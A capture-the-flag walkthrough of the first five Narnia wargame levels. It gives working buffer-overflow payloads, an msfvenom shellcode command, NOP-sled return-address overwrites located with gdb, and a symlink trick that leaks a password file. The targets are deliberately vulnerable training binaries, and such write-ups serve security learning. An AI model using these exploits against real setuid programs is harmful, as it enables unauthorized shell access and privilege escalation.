# Walkthrough

### narnia0:

The first challange is short `C` program with a bufferoverflow, an extract below:
```c
int main(){
        long val=0x41414141;
        char buf[20];

        printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
        printf("Here is your chance: ");
        scanf("%24s",&buf);

        printf("buf: %s\n",buf);
        printf("val: 0x%08x\n",val);

        if(val==0xdeadbeef)
                system("/bin/sh");
```
I solved it by: ```python -c'print("A"*25 + "\xef\xbe\xad\xde\xaf")'``` which gives the string: ```AAAAAAAAAAAAAAAAAAAAﾭޯ.```. The last byte is not included in the 0xdeadbeef but I needed it for my copypasta to work.
Pasting the string as the argument to narnia0 gives the shell as narnia1
```
narnia0@melinda:/narnia$ ./narnia0 
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: AAAAAAAAAAAAAAAAAAAAﾭޯ.
buf: AAAAAAAAAAAAAAAAAAAAﾭ
                          val: 0xdeadbeef
$ whoami 
narnia1
```
Another way too input the information and keep the shell open is to:
```(python -c 'print "A"*20+"\xef\xbe\xad\xde"'; cat)| /narnia/narnia`0```

### narnia1:

The second challange will try to run an enviormental varible called `EGG`, so a shellcode executable should be set to it.

I used the metasploit tool venom to generate the code:
```
msfvenom -b '\x00' -p linux/x86/exec cmd="/bin/sh" -f python
```
and just add the buffer given from venom to a short python script and export to `EGG` 
```
$ export EGG=$(./shell.py) 
$ /narnia/narnia1
 Trying to execute EGG!
$ whoami
 narnia2
```


### narnia2

The thrid challange is an buffer over flow where the function `strcpy()` 
dosen't check for the lenght of the user input.

I increased the arguments length untill I got a segment fault at 140 bytes. 

To investigate which memory address I should point back towards I utilized the gnu debugger gdb.

```
narnia2@melinda:/tmp/tmp.0dkN8esAtW$ gdb /games/narnia/narnia2 -q
Reading symbols from /games/narnia/narnia2...(no debugging symbols found)...done.
(gdb) r $(python -c 'print("\x41"*140+"\x43"*4)')
Starting program: /games/narnia/narnia2 $(python -c 'print("\x41"*140+"\x43"*4)')

Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
```
Seems to hit the spot. Now I need to find a memory address to point to instead of the x43s.
This is possible in this CTF as the machine do not have randomized memory allocation activated.
```
(gdb) x/200x $esp
...
0xffffd810:     0x6e2f6169      0x696e7261      0x41003261      0x41414141
0xffffd820:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd830:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd840:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd850:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd860:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd870:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd880:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd890:     0x41414141      0x41414141      0x41414141      0x41414141
0xffffd8a0:     0x41414141      0x43414141      0x00434343      0x5f474458
0xffffd8b0:     0x53534553      0x5f4e4f49      0x323d4449      0x32383131
0xffffd8c0:     0x48530034      0x3d4c4c45      0x6e69622f      0x7361622f
...
```

I truncated the output to save space in this text, but we can see that the address 
 0xffffd830 is in the middle of the NOP slide to be. 

The shell code I used in narnia1 is 70 bytes long, which means i need to add 70 
bytes in the beginging and overwrite the stack pointer with an address within the 
NOP-slide. 

The NOP instruction in the x86 architecture is the hex value 90, so the script
will be 
 ` print("\x90"*70+buf+"\x30\xd8\xff\xff") `
 where the "buf" is the shellcode from narnia1


### narnia3

The fourth flag is also a `strcpy()` overflow vulnerability. 

This time the function tries to copy the name of a file into a buffer without 
checking for the filenames length.

Giving the input file the name `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.txt.txt` (33 bytes)
results in the error message:
```
error opening A.txt
```
Indicating that the output file has been changed from the declared "/dev/null".
By makeing the input file a soft link to the password file, the password will be copied 
to the dedicated file.

```
$ ln -s /etc/narnia_pass/narnia4 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAo.txt
$ touch o.txt
$ /games/narnia/narnia3 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAo.txt
copied contents of AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAo.txt to a safer place... (o.txt)
$ cat o.txt
...
```

### narnia4

Once again an overflow.

Bruteforce apporach shows that a length of 272 bytes as an argument to narnia4 results
in `Illegal instruction` indicating that the base pointer `EBP` has been overwritten. 
This means that the next four bytes will overwrite the stack pointer esp.

Using the gdb method from narnia2 and the shellcode from narnia1 results in the
script `print("\x90"*(272-70)+buf+"\xa0\xd7\xff\xff")` depending on the 
memory address allocated.
```
$ /games/narnia/narnia4 $(./narnia4.py)
$ whoami
narnia5
$ cat /etc/narnia_pass/narnia5
...
```
